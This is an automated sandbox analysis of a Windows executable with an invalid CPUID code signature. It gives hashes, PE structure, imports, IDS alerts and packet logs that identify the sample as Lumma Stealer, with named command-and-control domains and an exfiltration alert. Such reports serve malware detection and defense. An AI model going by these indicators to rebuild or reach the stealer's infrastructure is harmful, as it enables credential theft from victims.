SHA1:	219e5f27a6b3f5b97add28a5f663ead6d524f4b0
SHA256:	8f9c072ea3c1246b4602b9f407c35191cc4007fad3076005d0194e89025ca365
SHA512:	38acb01a019cce3af96a51aa9cfb5609c34c4a35752b985cd6ade460e6820e75a9c81e064b018a1ca9953da789ef53350c6500fb2a6b2c9e6b546f64162555e4
SSDEEP:	24576:JW6QE/BE0RQZUhI5Arcsb+9/hAqx7ViycT9azR0Hh8UC9JqA+UqxPRgyb7Vb7j:80KOQ+XgsbEAG710HYJEa+
TLSH:	7BF723BFF5DF211EEB4C8B1B32A40A5474A2EF70180F45722DB97495BD22A88D05E52F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8.....

File Icon


Icon Hash:	c8d2d6e0aeea9946

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	03/07/2024 02:00:00 04/07/2025 01:59:59
Subject Chain	CN=CPUID, O=CPUID, S=Nord, C=FR, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=FR, SERIALNUMBER=493 590 202 00047
Version:	3
Thumbprint MD5:	8482FFDA9E08210CFED2F900F28A1F2E
Thumbprint SHA-1:	B46B17F6C24351D61F1CB1B830FA1546CAAFD411
Thumbprint SHA-256:	CA3BD5C3F6EEF3799D48651CD1372FEB84649358ADE03108B14DB14CD4239A83
Serial:	7B6D149DF3DF52D8797362ED082FC2A1

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F07DD5996ABh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F07DD59938Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F07DD59937Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F07DD596C7Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F07DD599051h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F07DD596D03h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F07DD596C7Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xd266	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x45fffdf	0x2ed8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xd266	0xd400	9648d6771fe1140a62266555ed11707c	False	0.9202535377358491	data	7.671081921776084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x102000	0xf32	0x1000	677020f94295cacbbbcc0d73e1ffef80	False	0.60009765625	data	5.520154589778318	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41f0	0x9362	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.000556586270872
RT_ICON	0xfd554	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.7524410089503661
RT_ICON	0xffbbc	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.8132969034608379
RT_DIALOG	0x100ce4	0x100	data	English	United States	0.5234375
RT_DIALOG	0x100de4	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x100f00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x100f60	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0x100f90	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:28:03.558872+0100	2059051	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)	1	192.168.2.5	50381	1.1.1.1	53	UDP
2025-01-10T23:28:03.575154+0100	2059041	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)	1	192.168.2.5	61126	1.1.1.1	53	UDP
2025-01-10T23:28:03.585264+0100	2059035	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)	1	192.168.2.5	63819	1.1.1.1	53	UDP
2025-01-10T23:28:03.597572+0100	2059039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)	1	192.168.2.5	65405	1.1.1.1	53	UDP
2025-01-10T23:28:03.608592+0100	2059057	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)	1	192.168.2.5	56069	1.1.1.1	53	UDP
2025-01-10T23:28:03.619601+0100	2059037	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)	1	192.168.2.5	60134	1.1.1.1	53	UDP
2025-01-10T23:28:03.630579+0100	2059043	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)	1	192.168.2.5	53020	1.1.1.1	53	UDP
2025-01-10T23:28:03.641209+0100	2059049	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)	1	192.168.2.5	59614	1.1.1.1	53	UDP
2025-01-10T23:28:04.312317+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49871	104.102.49.254	443	TCP
2025-01-10T23:28:04.910878+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49871	104.102.49.254	443	TCP
2025-01-10T23:28:05.524064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49882	104.21.32.1	443	TCP
2025-01-10T23:28:17.133440+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49882	104.21.32.1	443	TCP
2025-01-10T23:28:17.133440+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49882	104.21.32.1	443	TCP
2025-01-10T23:28:17.637094+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49962	104.21.32.1	443	TCP
2025-01-10T23:28:18.111531+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49962	104.21.32.1	443	TCP
2025-01-10T23:28:18.111531+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49962	104.21.32.1	443	TCP
2025-01-10T23:28:18.854106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49970	104.21.32.1	443	TCP
2025-01-10T23:28:19.339853+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49970	104.21.32.1	443	TCP
2025-01-10T23:28:19.827278+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49978	104.21.32.1	443	TCP
2025-01-10T23:28:20.857657+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49985	104.21.32.1	443	TCP
2025-01-10T23:28:41.782800+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49987	104.21.32.1	443	TCP
2025-01-10T23:28:42.729942+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49988	104.21.32.1	443	TCP
2025-01-10T23:28:45.728519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49989	104.21.32.1	443	TCP
2025-01-10T23:28:47.789238+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49990	104.21.32.1	443	TCP
2025-01-10T23:28:48.270897+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49990	104.21.32.1	443	TCP
2025-01-10T23:28:49.140141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49991	185.161.251.21	443	TCP
2025-01-10T23:28:49.971104+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49992	172.67.162.153	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:28:03.664024115 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:03.664055109 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:03.664154053 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:03.665327072 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:03.665338993 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.312202930 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.312316895 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.315773010 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.315783024 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.316175938 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.356489897 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.365696907 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.407339096 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.910883904 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.910923004 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.910953999 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.910984039 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.911047935 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.911083937 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.911097050 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:04.911108017 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.911108017 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.911108017 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:04.911140919 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.003017902 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.003087044 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.003129959 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.003206015 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.003245115 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.003335953 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.008492947 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.008584976 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.013653040 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.013715029 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.013732910 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.013751984 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.013796091 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.014789104 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.014811039 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.014834881 CET	49871	443	192.168.2.5	104.102.49.254
Jan 10, 2025 23:28:05.014842033 CET	443	49871	104.102.49.254	192.168.2.5
Jan 10, 2025 23:28:05.030519962 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.030571938 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:05.030649900 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.031013966 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.031024933 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:05.523895979 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:05.524064064 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.553473949 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.553483963 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:05.554548979 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:05.555649996 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.555924892 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:05.555974007 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.133462906 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.133697987 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.133749008 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.134212971 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.134232044 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.134243965 CET	49882	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.134249926 CET	443	49882	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.146496058 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.146518946 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.146581888 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.147429943 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.147439957 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.636930943 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.637094021 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.638288021 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.638298035 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.638686895 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:17.639842033 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.639859915 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:17.639914036 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111560106 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111618042 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111654997 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111695051 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111732006 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111768007 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111816883 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.111820936 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111841917 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.111854076 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.111875057 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.112217903 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.112433910 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.112485886 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.112494946 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.153371096 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.153383017 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.200265884 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.202972889 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.203057051 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.203090906 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.203190088 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.203202009 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.203227043 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.203241110 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.232708931 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.233091116 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.233170986 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.233189106 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.233201027 CET	49962	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.233205080 CET	443	49962	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.371764898 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.371808052 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.371876955 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.372195959 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.372208118 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.853816032 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.854105949 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.855401039 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.855412960 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.856350899 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:18.857666016 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.857811928 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:18.857893944 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.339925051 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.340177059 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.340236902 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.340327024 CET	49970	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.340358973 CET	443	49970	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.354871988 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.354911089 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.354975939 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.355487108 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.355499029 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.827193022 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.827277899 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.830943108 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.830964088 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.831409931 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.832519054 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.832672119 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.832705021 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:19.832762003 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:19.875341892 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.328958988 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.329075098 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.329299927 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.329387903 CET	49978	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.329430103 CET	443	49978	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.380945921 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.380999088 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.381077051 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.381350040 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.381361961 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.857319117 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.857656956 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.858932972 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.858946085 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.859523058 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.860586882 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.860702991 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.860737085 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:20.860816956 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:20.860826969 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.116357088 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.116615057 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.116899014 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.117110968 CET	49985	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.117139101 CET	443	49985	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.307038069 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.307066917 CET	443	49987	104.21.32.1	192.168.2.5
